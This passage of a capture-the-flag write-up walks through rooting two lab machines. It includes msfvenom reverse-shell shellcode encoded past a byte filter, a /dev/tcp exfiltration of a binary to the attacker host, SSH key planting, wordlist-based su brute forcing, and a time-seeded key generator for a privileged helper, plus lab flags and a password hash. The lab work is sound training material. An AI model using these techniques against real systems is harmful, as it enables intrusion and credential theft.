v10 = (std::ostream *)std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
std::endl<char,std::char_traits<char>>(v10);
}
}
}
}
perror("[!] 监听失败");
close(fd);
return 1;
}
else
{
perror(&unk_53C061);
close(fd);
return 1;
}
}
}
else
{
perror("[!] socket创建失败");
return 1;
}
}
This code is a TCP server listening on port 6666. It receives shellcode sent by the client and executes it, but filters specific dangerous bytes to prevent attacks. Detailed analysis:
1. Initialization and signal handling
Signal handling: registers a handler for SIGSEGV (segmentation fault) and SIGPIPE (broken pipe) to make the program more robust.
Socket creation: socket(2, 1, 0) creates a TCP socket (AF_INET + SOCK_STREAM).
Address reuse: setsockopt sets SO_REUSEADDR to avoid port-in-use problems.
2. Bind and listen
Bind: binds the socket to local port 6666 (ntohs(6666) converts to network byte order).
Listen: calls listen with a backlog of 5.
3. Accepting client connections
Accept loop: accept is called in an infinite loop; each connection returns a new file descriptor v21.
I/O redirection: dup2 redirects stdin, stdout and stderr to the client socket so the program interacts with the client.
4. Reading and filtering data
Read: reads at most 4096 bytes (0x1000) from the client into the stack buffer buf.
Byte filter: every byte is checked against the global forbidden_bytes; if any is found, execution is refused and an error message is returned.
5. Shellcode execution
Memory mapping: mmap allocates a readable, writable and executable region (PROT_READ|WRITE|EXEC).
Copy and execute: the client data (shellcode) is copied into the mapped memory and jumped to.
Cleanup: after execution, munmap frees the memory and the connection is closed.
Key security mechanisms
Forbidden-byte filter: forbidden_bytes blocks code containing dangerous instructions (such as syscall) from running.
Memory protection: mmap's MAP_ANONYMOUS flag avoids file mappings and limits the scope of the memory.
Potential risks
Filter bypass: if forbidden_bytes does not cover every dangerous instruction (e.g. encoded shellcode), malicious code can still run.
Memory execution risk: allowing arbitrary code execution is extremely risky; client trust must be strictly limited.
Summary
This program is an experimental shellcode execution environment: it listens on a port, receives code and runs it, with a basic filter added. Be aware of its security risks; it is suitable for closed test environments and should not be exposed to the public internet.
So there are forbidden bytes; forbidden_bytes can be traced in IDA:
.rodata:000000000053C009 _ZL15forbidden_bytes db 0 ; DATA XREF: main+25E↑o
.rodata:000000000053C009 ; main+269↑o
.rodata:000000000053C00A db 20h
.rodata:000000000053C00B db 0Fh
.rodata:000000000053C00C db 0CDh
.rodata:000000000053C00D db 9
.rodata:000000000053C00E db 22h ; "
.rodata:000000000053C00F db 0Ah
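As an added example (not code from the page, the target binary or its author), the nested check loop from the decompiled main() and its accept/reject decision reimplemented in C with the seven-byte table from the .rodata dump above; the last helper shows what the filter never sees, namely the bytes after a one-byte XOR decode. All sample buffers are constructed.

```c
#include <stddef.h>
#include <stdio.h>

/* Byte table as dumped from the server's .rodata (_ZL15forbidden_bytes,
 * 7 bytes from 0x53C009): NUL, space, 0x0F, 0xCD, tab, double quote, LF.
 * 0x0F and 0xCD are the first bytes of `syscall` (0F 05) and `int 0x80`
 * (CD 80); the others are classic string-delimiter "bad characters". */
static const unsigned char forbidden_bytes[7] = {
    0x00, 0x20, 0x0F, 0xCD, 0x09, 0x22, 0x0A
};

/* Same scan as the nested loop in the decompiled main(): returns 1 as soon
 * as any input byte is found in the table, 0 if none is. */
int contains_forbidden(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        const unsigned char *p   = forbidden_bytes;
        const unsigned char *end = forbidden_bytes + sizeof forbidden_bytes;
        while (p != end) {
            if (*p == buf[i])
                return 1;
            p++;
        }
    }
    return 0;
}

/* The server's decision. v25 starts as (len > 0), so an empty or failed
 * read() is rejected too. 1 = the server would mmap the bytes RWX and
 * call them, 0 = "Hackers, get out of my machine". */
int server_accepts(const unsigned char *buf, long len)
{
    if (len <= 0)
        return 0;
    return !contains_forbidden(buf, (size_t)len);
}

/* What the filter cannot see: it only inspects the bytes on the wire.
 * A self-decoding stub (what the x64/xor encoder used on this page emits)
 * rebuilds the banned bytes in memory after the check has passed. This
 * counts how many banned bytes a buffer contains once XOR-decoded with a
 * one-byte key, i.e. in what is actually executed. */
int forbidden_after_xor(const unsigned char *buf, size_t len, unsigned char key)
{
    int n = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char decoded = buf[i] ^ key;
        if (contains_forbidden(&decoded, 1))
            n++;
    }
    return n;
}

int main(void)
{
    /* constructed samples */
    const unsigned char clean[]   = {0x48, 0x31, 0xC9};       /* xor rcx,rcx */
    const unsigned char syscall_[] = {0x48, 0x0F, 0x05};      /* contains 0x0F */
    const unsigned char encoded[] = {0x4E, 0x44, 0x8C};       /* 0F 05 CD ^ 0x41 */

    printf("clean    accepted=%d\n", server_accepts(clean, sizeof clean));
    printf("syscall  accepted=%d\n", server_accepts(syscall_, sizeof syscall_));
    printf("encoded  accepted=%d, forbidden bytes after decode=%d\n",
           server_accepts(encoded, sizeof encoded),
           forbidden_after_xor(encoded, sizeof encoded, 0x41));
    return 0;
}
```

The table bans the lead bytes of syscall and int 0x80 plus NUL, tab, LF, space and double quote, but the scan covers only the bytes as received; anything that decodes itself inside the RWX mapping is checked before it exists. A byte blocklist is therefore not a security control for data that is going to be executed; the only real defence is never to map attacker-supplied input executable.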
From the dump, the forbidden bytes are 0x00 (NULL), 0x20 (space), 0x0F and 0xCD (the table also lists 0x09, 0x22 and 0x0A). Use msfvenom to generate a reverse-shell shellcode:
┌──(root㉿kali-plus)-[~/easypwn]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4444 -b '\x00\x20\x0f\xcd' -f raw > tmp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
xxd shows the file's hex dump
┌──(root㉿kali-plus)-[~/easypwn]
└─# xxd tmp
00000000: 4831 c948 81e9 f6ff ffff 488d 05ef ffff H1.H......H.....
00000010: ff48 bb56 b0d9 320a ef81 cb48 3158 2748 .H.V..2....H1X'H
00000020: 2df8 ffff ffe2 f43c 9981 ab60 edde a157 -......<...`...W
00000030: eed6 3742 78c9 7254 b0c8 6eca 47b9 ae07 ..7Bx.rT..n.G...
00000040: f850 d460 ffdb a17c e8d6 3760 ecdf 83a9 .P.`...|..7`....
00000050: 7eb3 1352 e084 bea0 dae2 6a93 a73a e434 ~..R......j..:.4
00000060: d9b7 1d79 8781 981e 393e 605d a708 2d59 ...y....9>`]..-Y
00000070: b5d9 320a ef81 cb ..2....
┌──(root㉿kali-plus)-[~]
└─# nc -lp 4444
id
uid=1001(lamb) gid=1001(lamb) groups=1001(lamb)
bash
ls
this_is_a_tips.txt
use3e3e3e3e3sr.txt
Reverse shell obtained; now the user flag can be read
lamb@pwnding:/home/lamb$ cat use3e3e3e3e3sr.txt
cat use3e3e3e3e3sr.txt
flag{3a463d08f2ae11efbeb6000c29094b2d}
Privilege escalation - root flag
First write my own public key in and see whether I can connect:
mkdir .ssh
cd .ssh
echo 'ssh-rsa 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 root@kali-plus' > authorized_keys
ssh lamb@192.168.56.110
lamb@pwnding:~$ ls
this_is_a_tips.txt use3e3e3e3e3sr.txt
lamb@pwnding:~$ cat this_is_a_tips.txt
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.
Next, dpkg -V can be used to see which files have been modified.
dpkg is short for "Debian Package", the core command-line package management tool on Debian and its derivatives (such as Ubuntu).
dpkg -V verifies installed packages by checking whether their files have been modified. Specifically, it compares the files currently installed on the system with those of the original package to detect changes. This is useful when auditing a system or checking whether files have been tampered with.
lamb@pwnding:~$ dpkg -V
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
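To make sense of this output programmatically, here is an added C helper (not from the page or from dpkg itself) that parses dpkg -V lines: the 9-character status field, the optional c attribute (conffile) and the path. It also pairs each status line with a preceding "unable to open ... for hash" warning, because a 5 (md5sum check failed) that dpkg prints right after it could not read the file says nothing about whether the file was changed. The sample is constructed from the two lines captured above plus one made-up non-conffile line (/usr/bin/example-binary does not exist on the target).

```c
#include <stdio.h>
#include <string.h>

/* One parsed status line. dpkg prints an rpm-style 9-character field
 * ('?' = not checked, '.' = passed, letter = failed check; position 3 is
 * the md5sum check, '5'), then an optional attribute ('c' = conffile),
 * then the path. Current dpkg only implements the md5sum check. */
struct verify_entry {
    int md5_mismatch;
    int is_conffile;
    char path[256];
};

struct verify_report {
    int mismatched;     /* status lines reporting a '5' */
    int conffiles;      /* ... of which are conffiles */
    int inconclusive;   /* ... of which dpkg could not actually hash */
};

/* "dpkg: warning: <pkg>: unable to open <path> for hash: ..." -> path */
static int parse_hash_warning(const char *line, char *out, size_t outlen)
{
    const char *start = strstr(line, "unable to open ");
    if (!start) return 0;
    start += strlen("unable to open ");
    const char *end = strstr(start, " for hash");
    if (!end || (size_t)(end - start) >= outlen) return 0;
    memcpy(out, start, (size_t)(end - start));
    out[end - start] = '\0';
    return 1;
}

/* Returns 1 if the line is a status line, 0 otherwise (warnings etc.). */
int parse_verify_line(const char *line, struct verify_entry *out)
{
    memset(out, 0, sizeof *out);
    const char *p = line;
    size_t slen = strcspn(p, " \t");
    if (slen != 9) return 0;
    for (size_t i = 0; i < 9; i++)
        if (p[i] != '?' && p[i] != '.' && strchr("SM5DLUGT", p[i]) == NULL)
            return 0;
    out->md5_mismatch = (p[2] == '5');
    p += slen;
    p += strspn(p, " \t");
    if (p[0] == 'c' && (p[1] == ' ' || p[1] == '\t')) {   /* attribute field */
        out->is_conffile = 1;
        p += 1 + strspn(p + 1, " \t");
    }
    size_t plen = strcspn(p, "\r\n");
    if (plen == 0 || plen >= sizeof out->path) return 0;
    memcpy(out->path, p, plen);
    out->path[plen] = '\0';
    return 1;
}

/* Walk the whole dpkg -V output and summarise the md5 mismatches. */
struct verify_report summarize_dpkg_verify(const char *text)
{
    struct verify_report r = {0, 0, 0};
    char warned[256] = "";
    const char *p = text;
    while (*p != '\0') {
        char line[512];
        size_t n = strcspn(p, "\n");
        size_t copy = n < sizeof line ? n : sizeof line - 1;
        memcpy(line, p, copy);
        line[copy] = '\0';
        p += n;
        if (*p == '\n') p++;
        if (parse_hash_warning(line, warned, sizeof warned)) continue;
        struct verify_entry e;
        if (!parse_verify_line(line, &e) || !e.md5_mismatch) continue;
        r.mismatched++;
        if (e.is_conffile) r.conffiles++;
        if (strcmp(e.path, warned) == 0) r.inconclusive++;  /* unreadable, not proven changed */
        warned[0] = '\0';
    }
    return r;
}

/* Convenience wrappers for single-line checks (-1 = not a status line). */
int line_md5_mismatch(const char *line)
{ struct verify_entry e; return parse_verify_line(line, &e) ? e.md5_mismatch : -1; }
int line_is_conffile(const char *line)
{ struct verify_entry e; return parse_verify_line(line, &e) ? e.is_conffile : -1; }

/* Constructed sample: the two captured entries plus one made-up line. */
const char SAMPLE_DPKG_V[] =
    "dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied\n"
    "??5?????? c /etc/sudoers\n"
    "dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied\n"
    "??5?????? c /etc/sudoers.d/README\n"
    "??5??????   /usr/bin/example-binary\n";

int main(void)
{
    struct verify_report r = summarize_dpkg_verify(SAMPLE_DPKG_V);
    printf("mismatched=%d conffiles=%d inconclusive=%d\n",
           r.mismatched, r.conffiles, r.inconclusive);
    return 0;
}
```

A 5 that directly follows an "unable to open ... for hash" warning only tells you that dpkg could not hash the file as the current user (here lamb cannot read /etc/sudoers, which is mode 0440); run dpkg -V as root, or compare against a known-good copy of the package, before treating such an entry as evidence of tampering.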
/etc/sudoers has been modified, which is why sudo now asks for a password, and we have no password. So back to that hint: we need getroot. First find where the getroot file is:
lamb@pwnding:~$ find / -name 'getroot' 2>/dev/null
/usr/local/bin/getroot
Having found getroot, get it onto Kali and then onto the local machine for analysis:
cp /usr/local/bin/getroot .
cat getroot > /dev/tcp/192.168.56.101/1234
Open another terminal to listen:
nc -lp 1234 > getroot
But we don't have lamb's password, so the target is now to find it. Use find / -user lamb 2>/dev/null|grep -Pv 'sys|proc|run' to look for it:
lamb@pwnding:~$ find / -user lamb 2>/dev/null|grep -Pv 'sys|proc|run'
/dev/pts/1
/home/lamb
/home/lamb/.viminfo
/home/lamb/getroot
/home/lamb/.profile
/home/lamb/.bashrc
/home/lamb/use3e3e3e3e3sr.txt
/home/lamb/.bash_logout
/home/lamb/.ssh
/home/lamb/.ssh/authorized_keys
/home/lamb/.bash_history
Nothing we need. Next look for hidden files with find / -name '.*' 2>/dev/null|grep -Pv 'sys|proc|run':
lamb@pwnding:~$ find / -name '.*' 2>/dev/null|grep -Pv 'sys|proc|run'
/var/backups/.secret
/var/backups/.secret/.verysecret
/var/backups/.secret/.verysecret/.noooooo
/home/lamb/.viminfo
/home/lamb/.profile
/home/lamb/.bashrc
/home/lamb/.bash_logout
/home/lamb/.ssh
/home/lamb/.bash_history
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.d/.placeholder
/etc/cron.weekly/.placeholder
/etc/cron.monthly/.placeholder
/etc/skel/.profile
/etc/skel/.bashrc
/etc/skel/.bash_logout
/etc/.pwd.lock
/var/backups/.secret/.verysecret/.noooooo was found
lamb@pwnding:~$ cd /var/backups/.secret/.verysecret/.noooooo
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ ls
note2.txt
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ cat note2.txt
The Compass and the Campfire
David knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David’s calloused fingers brushed the cracked compass in his palm—a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just… rerouting."
Jake’s eyes narrowed, too sharp for comfort. "Your compass is broken."
A chuckle escaped David, brittle as dry leaves. "Compasses don’t break, bud. They… forget." He flipped it open, the glass fogged with age. "See? North isn’t where it should be. It’s where it chooses to be tonight."
The boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake’s fear dissolved into giggles. David watched, throat tight. He’s still young enough to laugh at squirrels.
"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We’ve got supplies. Let’s build a fort."
They wove branches into a crooked shelter, Jake’s hands steady where David’s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it’d always point home."
Jake snapped the glowstick, bathing their fort in alien green. "Does it work now?"
The needle quivered, settling northwest. Toward the distant highway hum, not their cabin’s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake’s pocket—where a crumpled trail map peeked out, dotted with the boy’s doodled dinosaurs.
Dawn found them at the cabin’s porch, guided by Jake’s roars laughter and the squirrels he’d named "Sir Nibbles". The compass stayed in David’s pocket, its secret safe: true north had shifted years ago, anyway—from steel poles to a gap-toothed grin eating pancakes at 6 AM.
That is the hint; together with the earlier mention of cupp, the idea is to use cupp to generate a wordlist
┌──(root㉿kali)-[~]
└─# cupp -i
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
print(" \ # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
print(" \ \033[1;31m,__,\033[1;m # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
print(" \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
print(" \033[1;31m(__) )\ \033[1;m ")
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: David
> Surname: knelt
> Nickname:
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name: Jake
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to david.txt, counting 298 words.
[+] Now load your pistolero with david.txt and shoot! Good luck!
┌──(root㉿kali)-[~]
└─# cat david.txt
Next we need the suForce tool together with the david.txt wordlist.
lamb@pwnding:/tmp$ bash suForce -u lamb -w david.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
Username | lamb
Wordlist | david.txt
Status | 203/297/68%/ekaJ_2016
Password | ekaJ_2016
───────────────────────────────────
We get the password ekaJ_2016, which is the password for user lamb.
lamb@pwnding:/tmp$ sudo -l
[sudo] password for lamb:
Matching Defaults entries for lamb on pwnding:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lamb may run the following commands on pwnding:
(ALL : ALL) PASSWD: /usr/local/bin/getroot
lamb@pwnding:/tmp$ sudo /usr/local/bin/getroot
Usage: /usr/local/bin/getroot <magic_number>
Next we turn to analyzing the getroot binary: find the main function and have DeepSeek analyze it.
int __fastcall main(int argc, const char **argv, const char **envp)
{
double v3; // xmm0_8
__int64 v4; // rax
__int64 v5; // rax
__int64 v6; // rdx
__int64 v7; // rax
int v8; // ebx
unsigned int v9; // eax
__int64 v10; // rax
__int64 v11; // rax
char v13[256]; // [rsp+10h] [rbp-260h] BYREF
__int64 v14; // [rsp+110h] [rbp-160h] BYREF
char v15[32]; // [rsp+220h] [rbp-50h] BYREF
int v16; // [rsp+240h] [rbp-30h] BYREF
int v17; // [rsp+244h] [rbp-2Ch] BYREF
int v18; // [rsp+248h] [rbp-28h] BYREF
char v19; // [rsp+24Fh] [rbp-21h] BYREF
double v20; // [rsp+250h] [rbp-20h]
int v21; // [rsp+258h] [rbp-18h]
int v22; // [rsp+25Ch] [rbp-14h]
if ( argc > 1 )
{
v22 = atoi(argv[1]);
v9 = time(0LL);
srand(v9);
v21 = rand() % 86400;
generate_normal_distribution();
v20 = v3;
v16 = (5.0 * v3) + v21;
v17 = 86399;
v10 = std::min<int>(&v16, &v17);
v18 = 0;
v16 = *std::max<int>(&v18, v10);
std::allocator<char>::allocator(&v19);
std::string::basic_string(v15, "/root/cred", &v19);
std::allocator<char>::~allocator(&v19);
if ( v22 == v16 + 12345 )
{
std::ifstream::basic_ifstream(v13, v15, 8LL);
if ( std::ios::operator bool(&v14) )
{
v11 = std::ifstream::rdbuf(v13);
std::ostream::operator<<(&std::cout, v11);
}
std::ifstream::~ifstream(v13);
}
v8 = 0;
std::string::~string(v15);
}
else
{
v4 = std::operator<<<std::char_traits<char>>(&std::cerr, "Usage: ", envp);
v5 = std::operator<<<std::char_traits<char>>(v4, *argv, v4);
v7 = std::operator<<<std::char_traits<char>>(v5, " <magic_number>", v6);
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
return 1;
}
return v8;
}
This program requires a specific magic number (magic_number) before it will read the /root/cred file. It combines pseudo-random number generation with a normal-distribution calculation to derive a check value dynamically; only the correct argument reveals the file's contents.
Code logic analysis
1. Argument check
if ( argc > 1 )
Checks whether a command-line argument was given (argc > 1).
If not, it prints the usage message and exits:
std::cerr << "Usage: " << argv[0] << " <magic_number>" << std::endl;
return 1;
2. Random number initialization
v22 = atoi(argv[1]); // the user-supplied argument
v9 = time(0LL); // current timestamp
srand(v9); // seed the random number generator with the timestamp
v21 = rand() % 86400; // random number in 0~86399 (seconds in one day)
v22 is the user-supplied argument (argv[1]).
v21 is a random number derived from the current time (range: 0~86399).
3. Normal distribution calculation
generate_normal_distribution(); // generate a normally distributed value
v20 = v3; // store the normal-distribution result
v16 = (5.0 * v3) + v21; // compute the offset value
generate_normal_distribution() produces a random number v3 following a standard normal distribution (μ=0, σ=1).
v16 = 5.0 * v3 + v21:
5.0 * v3 introduces random jitter (±5σ).
+ v21 keeps the final value close to v21.
4. Range clamping
v17 = 86399;
v10 = std::min<int>(&v16, &v17); // ensure v16 ≤ 86399
v18 = 0;
v16 = *std::max<int>(&v18, v10); // ensure v16 ≥ 0
v16 is clamped to 0~86399 (prevents going out of range).
5. Magic number check
if ( v22 == v16 + 12345 )
The user-supplied v22 must equal v16 + 12345 to pass the check.
12345 is a fixed offset meant to make guessing harder.
6. Reading the /root/cred file
std::ifstream::basic_ifstream(v13, "/root/cred", 8LL);
if ( std::ios::operator bool(&v14) ) // check that the file opened successfully
{
v11 = std::ifstream::rdbuf(v13);
std::ostream::operator<<(&std::cout, v11); // print the file contents
}
If the check passes, the program reads /root/cred and prints its contents.
Otherwise it simply exits.
Key points
Dynamic check mechanism:
A random number v21 is generated from the current time (time(0)).
A normal distribution (generate_normal_distribution()) adds further randomness.
The final check value v16 + 12345 is computed dynamically and may differ on every run.
File access control:
/root/cred can only be read by supplying the correct magic_number.
The file is probably a sensitive credential (such as a password or key).
Security design:
srand(time(0)) makes the check value differ from run to run.
The normal distribution makes reverse engineering harder.
That is DeepSeek's explanation. Next, have DeepSeek write a program that outputs only the number, and give us a way to compile it.
#include <iostream>
#include <cmath>
#include <ctime>
#include <cstdlib>
#include <algorithm>
using namespace std;
double generate_normal_distribution() {
    // Two rand() calls here, to keep the call order consistent with the later rand() calls
    double x = rand() / 2147483647.0; // note: 2147483647 = 0x7FFFFFFF (RAND_MAX on glibc)
    double v3 = rand() / 2147483647.0;
    double v0 = log(x); // the log computation from the original IDA pseudocode
    double v2 = sqrt(-2.0 * v0); // square-root part
    // 6.283185307179586 is 2*M_PI at double precision
    return cos(6.283185307179586 * v3) * v2;
}
int main() {
    srand(time(0)); // seed with the current time, as getroot does
    // first random number (corresponds to v21 in the original program)
    int v21 = rand() % 86400;
    // normally distributed value (consumes the next two rand() calls)
    double normal_value = generate_normal_distribution();
    // compute the final value
    // note: the decompiled main converts the whole sum, (int)(5.0 * v3 + v21);
    // truncating the product first, as below, can differ by one when v3 is negative
    int temp = static_cast<int>(5.0 * normal_value) + v21;
    temp = max(0, min(temp, 86399)); // clamp to the allowed range
    int key = temp + 12345; // final key
    cout << key << endl;
    return 0;
}
DeepSeek's generated code had problems; using the expert's solution we got root's password.
lamb@pwnding:~$ vi a.c
lamb@pwnding:~$ g++ -o key a.c -B /usr/bin/
lamb@pwnding:~$ ./key
59121
lamb@pwnding:~$ ./key
67002
lamb@pwnding:~$ sudo /usr/local/bin/getroot $(./key)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0
This $1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0 is root's credential; switch to root with it directly.
lamb@pwnding:~$ su - root
Password:
root@pwnding:~# id
uid=0(root) gid=0(root) groups=0(root)
root@pwnding:~# ls
cred monitor.sh ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
root@pwnding:~# cat ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
flag{46511d58f2ae11ef9ea3000c29094b2d}
Todd
Information gathering
nmap finds a lot of open ports.
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 17:00 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.111
Host is up (0.0078s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3304/tcp open opsession-srvr
5554/tcp open sgi-esphttp
7066/tcp open unknown
8178/tcp open unknown
10759/tcp open unknown
10854/tcp open unknown
18869/tcp open unknown
20113/tcp open unknown
23119/tcp open unknown
26713/tcp open unknown
28950/tcp open unknown
MAC Address: 08:00:27:5B:C1:7B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.19 seconds
Running the same nmap command again shows that the open ports differ between the two scans, but 7066 stays the same.
Next, scan for directories with gobuster.
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.111/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.111/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tools (Status: 301) [Size: 316] [--> http://192.168.56.111/tools/]
The scan turns up a tools directory containing some common tools such as fscan, pspy64 and linpeas.sh, but nothing else of note.
user flag
Let's connect with nc first and take a look.
┌──(root㉿kali-plus)-[~]
└─# nc 192.168.56.111 7066
pwd
/root
cd ..
pwd
/
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd home
ls
todd
cd todd
ls
user.txt
cat user.txt
Todd{eb93009a2719640de486c4f68daf62ec}
Using the tools we found earlier in the tools directory, go to /var/www/html/tools and run them.
┌──(root㉿kali-plus)-[~]
└─# nc 192.168.56.111 7066
pwd
/root
cd ..
pwd
/
cd var/www/html
ls
index.html
tools
cd tools
ls
fscan
les.sh
linpeas.sh
pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/03/23 04:06:59 CMD: UID=0 PID=31227 | /sbin/init
2025/03/23 04:06:59 CMD: UID=1000 PID=31217 | ./pspy64
2025/03/23 04:06:59 CMD: UID=1000 PID=31173 | nc -e /opt/fake_ssh -lp 32342
2025/03/23 04:06:59 CMD: UID=0 PID=31172 | sudo -u todd nc -e /opt/fake_ssh -lp 32342
2025/03/23 04:06:59 CMD: UID=0 PID=31171 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31170 | nc -e /opt/fake_ssh -lp 21247
2025/03/23 04:06:59 CMD: UID=0 PID=31169 | sudo -u todd nc -e /opt/fake_ssh -lp 21247
2025/03/23 04:06:59 CMD: UID=0 PID=31167 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31166 | nc -e /opt/fake_ssh -lp 2085
2025/03/23 04:06:59 CMD: UID=0 PID=31165 | sudo -u todd nc -e /opt/fake_ssh -lp 2085
2025/03/23 04:06:59 CMD: UID=0 PID=31163 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31162 | nc -e /opt/fake_ssh -lp 24265
2025/03/23 04:06:59 CMD: UID=0 PID=31161 | sudo -u todd nc -e /opt/fake_ssh -lp 24265
2025/03/23 04:06:59 CMD: UID=0 PID=31159 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31157 | nc -e /opt/fake_ssh -lp 2339
2025/03/23 04:06:59 CMD: UID=0 PID=31156 | sudo -u todd nc -e /opt/fake_ssh -lp 2339
2025/03/23 04:06:59 CMD: UID=0 PID=31154 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31153 | nc -e /opt/fake_ssh -lp 10146
2025/03/23 04:06:59 CMD: UID=0 PID=31152 | sudo -u todd nc -e /opt/fake_ssh -lp 10146
2025/03/23 04:06:59 CMD: UID=0 PID=31150 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31149 | nc -e /opt/fake_ssh -lp 30430
2025/03/23 04:06:59 CMD: UID=0 PID=31148 | sudo -u todd nc -e /opt/fake_ssh -lp 30430
2025/03/23 04:06:59 CMD: UID=0 PID=31146 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31145 | nc -e /opt/fake_ssh -lp 24204
2025/03/23 04:06:59 CMD: UID=0 PID=31144 | sudo -u todd nc -e /opt/fake_ssh -lp 24204
2025/03/23 04:06:59 CMD: UID=0 PID=31142 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31141 | nc -e /opt/fake_ssh -lp 23849
